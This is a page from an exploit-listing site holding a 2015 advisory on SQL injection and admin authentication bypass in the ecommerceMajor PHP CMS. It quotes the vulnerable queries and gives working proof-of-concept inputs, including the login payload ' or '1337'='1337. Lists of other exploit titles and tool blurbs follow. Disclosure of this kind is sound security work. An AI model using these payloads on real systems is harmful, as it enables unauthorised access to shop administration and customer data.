Menu

Search for hundreds of thousands of exploits

"ecommerceMajor - SQL Injection / Authentication Bypass"

Author

Exploit author

"Manish Tanwar"

Platform

Exploit platform

php

Release date

Exploit published date

2015-01-22

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
##################################################################################################
#Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass
#Author        : Manish Kishan Tanwar
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Date          : 22/01/2015
#Discovered at : IndiShell Lab
#Love to      : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi
#email        : manish.1046@gmail.com
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

ecommercemajor is the php based CMS for ecommerce portal

///////////////////////////////
// Vulnerability Description:
///////////////////////////////

SQL injection vulnerability:-
============================== 
in file product.php data from GET parameter 'productbycat' is not getting filter before passing into SQL query and hence rising SQL Injection vulnerability
---------------------
$getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc";
---------------------
POC

http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI


Authentication Bypass:-
============================== 
file index.php under directory __admin has SQL injection vulnerability
parameter username and password suppliedin post parameter for checking valid admin username and password is not getting filter before passing into SQL query which arise authentication bypass issue.
vulnerable code is 
-------------------
	if(isset($_POST[login]))
		{
$check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'";
			$checkresult=mysql_query($check);
			$checkcount=mysql_num_rows($checkresult);
			if($checkcount>0)
				{	
					$checkrow=mysql_fetch_array($checkresult);
					$_SESSION[adminname]=$checkrow[adminname];
					$_SESSION[adminloginstatus]="success";
					echo "<script>window.location='home.php';</script>";
				}
--------------------
POC

open admin panel 
http://127.0.0.1/ecommercemajor/__admin/
username: ' or '1337'='1337
password: ' or '1337'='1337



                             --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################
                             --==[[Love to]]==--
#Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
                       --==[[ Special Fuck goes to ]]==--
                            <3  suriya Cyber Tyson <3
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2018-03-27 "TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)" remote linux "Manish Tanwar"
2018-03-02 "TestLink Open Source Test Management < 1.9.16 - Remote Code Execution" remote php "Manish Tanwar"
2017-10-22 "WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)" remote php "Manish Tanwar"
2017-07-04 "Joomla! 3.7 - SQL Injection" remote php "Manish Tanwar"
2017-02-03 "Posnic Stock Management System - SQL Injection" remote php "Manish Tanwar"
2017-01-26 "PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting" webapps php "Manish Tanwar"
2016-01-05 "Online Airline Booking System - Multiple Vulnerabilities" webapps php "Manish Tanwar"
2015-10-26 "Joomla! 3.2.x < 3.4.4 - SQL Injection" webapps php "Manish Tanwar"
2015-08-26 "Magento eCommerce - Remote Code Execution" webapps xml "Manish Tanwar"
2015-08-25 "vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection" webapps php "Manish Tanwar"
2015-06-19 "Lively Cart - SQL Injection" webapps multiple "Manish Tanwar"
2015-04-09 "WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload" webapps php "Manish Tanwar"
2015-03-22 "Joomla! Component Spider FAQ - SQL Injection" webapps php "Manish Tanwar"
2015-01-22 "ecommerceMajor - SQL Injection / Authentication Bypass" webapps php "Manish Tanwar"
2014-12-23 "PHPMyRecipes 1.2.2 - 'browse.php?category' SQL Injection" webapps php "Manish Tanwar"
2014-12-08 "PBBoard CMS - Persistent Cross-Site Scripting" webapps php "Manish Tanwar"
2014-05-20 "Clipperz Password Manager - '/backend/PHP/src/setup/rpc.php' Remote Code Execution" webapps php "Manish Tanwar" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected